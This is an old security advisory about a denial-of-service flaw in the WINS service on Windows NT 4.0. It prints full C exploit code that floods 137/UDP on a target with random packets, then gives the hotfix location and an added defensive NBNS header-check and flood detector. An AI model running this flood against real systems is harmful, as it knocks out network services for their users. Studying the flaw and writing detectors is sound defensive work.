COMMAND

    WINS

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Ondřej Holas found the following.  When a flood of UDP packets of
    random size and contents is sent to port 137/UDP on a machine
    running WINS Server, the service stops after about 5 seconds.
    This was reproduced on several machines running NTS 4.0 + WINS.
    The service stops even with SP3 and all (12) recent post-SP3
    hotfixes installed.  The stop is regular, without an Access
    Violation, and a manual restart is possible (probably, when
    attacked, the WINS service reports its state to the SCM).  It was
    never tested on NT 3.5x.  Exploit code follows (in C).  To stop
    sending random 137/UDP packets to the specified address, simply
    press Ctrl-C.  The source is written to fit the Windows
    Sockets/Win32 API, but with very few modifications it can be
    compiled on UNIX or VMS machines (it uses standard socket
    routines - socket(), bind(), send()...).

    #include <windows.h>
    #include <stdio.h>
    #include <winsock.h>

    char buffer [512];

    int main ( int argc, char **argv )
    {
	    WSADATA WSAData;
	    SOCKET s;
	    SOCKADDR_IN local, remote;
	    int rlen, datalen, i;

	    if ( argc != 2 )
	    {
		    printf ( "Usage: WINSKILL <host-IP>\n" );
		    return 0;
	    }

	    WSAStartup ( MAKEWORD ( 1, 1 ), &WSAData );

	    s = socket ( AF_INET, SOCK_DGRAM, 0 );
	    if ( s == INVALID_SOCKET )
	    {
		    printf ( "socket() failed.\n" );
		    goto quit;
	    }

	    local.sin_family = AF_INET;
	    local.sin_port = htons ( 0 );
	    local.sin_addr.s_addr = INADDR_ANY;

	    if ( bind ( s, (struct sockaddr far*) &local, sizeof ( local ) ) == SOCKET_ERROR )
	    {
		    printf ( "bind() failed.\n" );
		    goto quit;
	    }

	    remote.sin_family = AF_INET;
	    remote.sin_port = htons ( 137 );
	    if ( ( remote.sin_addr.s_addr = inet_addr ( argv [1] ) ) == INADDR_NONE )
	    {
		    printf ( "Invalid format of IP address.\n" );
		    goto quit;
	    }

	    while ( 1 )
	    {
		    rlen = sizeof ( remote );

		    datalen = rand ( ) % 512;
		    for ( i = 0; i < datalen; i++ )
			    buffer [i] = rand ( ) % 256;
		    sendto ( s, buffer, datalen, 0, (struct sockaddr far*) &remote, rlen );
		    Sleep ( 10 );
	    }

    quit:
	    WSACleanup ( );

	    return 0;
    }

SOLUTION

    Microsoft has released a hotfix for the issue of flooding a WINS
    server by sending packets to UDP port 137.  The hotfix is
    available at:

        ftp.microsoft.com

    under the following path:

        /bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/winsupd-fix
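
    A defensive counterpart to the flood described under PROBLEM,
    added here as an example (it is not part of the original advisory
    or of Microsoft's fix): a header sanity check based on the
    RFC 1002 NetBIOS Name Service layout that flags random-payload
    datagrams sent to 137/UDP and alerts when one source sends too
    many in a window.  MALFORMED_LIMIT, the one-second window and all
    sample bytes are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#define MALFORMED_LIMIT 20  /* assumed alert threshold per source per window */
struct dgram { const uint8_t *data; size_t len; };

/* Constructed samples: a broadcast name-query header (name bytes left zero
 * for brevity) and two junk payloads like those a random flood produces. */
static const uint8_t sample_query[50] = {0x12,0x34, 0x01,0x10, 0,1, 0,0, 0,0, 0,0, 0x20};
static const uint8_t sample_short[7]  = {0xde,0xad,0xbe,0xef,0x01,0x02,0x03};
static const uint8_t sample_noise[16] = {0xa7,0x3c, 0xff,0xff, 0x91,0x02, 0x44,0x10, 0x08,0xc3, 0x77,0x5e, 1,2,3,4};

static unsigned be16(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* 1 if buf passes RFC 1002 header sanity checks, else 0 (not a full parser). */
int nbns_plausible(const uint8_t *buf, size_t len) {
    if (len < 12) return 0;                   /* fixed header is 12 bytes */
    unsigned flags  = be16(buf + 2);
    unsigned opcode = (flags >> 11) & 0xF;    /* OPCODE field without the R bit */
    if (flags & 0x0060) return 0;             /* reserved NM_FLAGS bits must be 0 */
    /* RFC 1002 opcodes: 0 query, 5 registration, 6 release, 7 WACK, 8 refresh. */
    if (opcode != 0 && (opcode < 5 || opcode > 8)) return 0;
    /* Smallest entries: question = 1-byte name + 4, record = 1-byte name + 10. */
    size_t need = 12 + 5u * be16(buf + 4)
                + 11u * (be16(buf + 6) + be16(buf + 8) + be16(buf + 10));
    return need > 12 && need <= len;          /* at least one entry, and it fits */
}

/* 1 if one source's datagrams in one time window should raise an alert. */
int window_is_flood(const struct dgram *d, size_t n) {
    size_t bad = 0;
    for (size_t i = 0; i < n; i++)
        if (!nbns_plausible(d[i].data, d[i].len)) bad++;
    return bad >= MALFORMED_LIMIT;
}

/* One constructed 1-second window of 100 datagrams (one every 10 ms). */
int demo_window(int flood) {
    struct dgram w[100];
    for (size_t i = 0; i < 100; i++)
        w[i] = flood ? (struct dgram){sample_noise, sizeof sample_noise}
                     : (struct dgram){sample_query, sizeof sample_query};
    return window_is_flood(w, 100);
}

int main(void) {
    printf("short=%d benign=%d flood=%d\n", nbns_plausible(sample_short, sizeof sample_short), demo_window(0), demo_window(1));
    return 0;
}
```

    The check covers only the opcodes listed in RFC 1002; widen the
    accepted set if hosts on the monitored network use others.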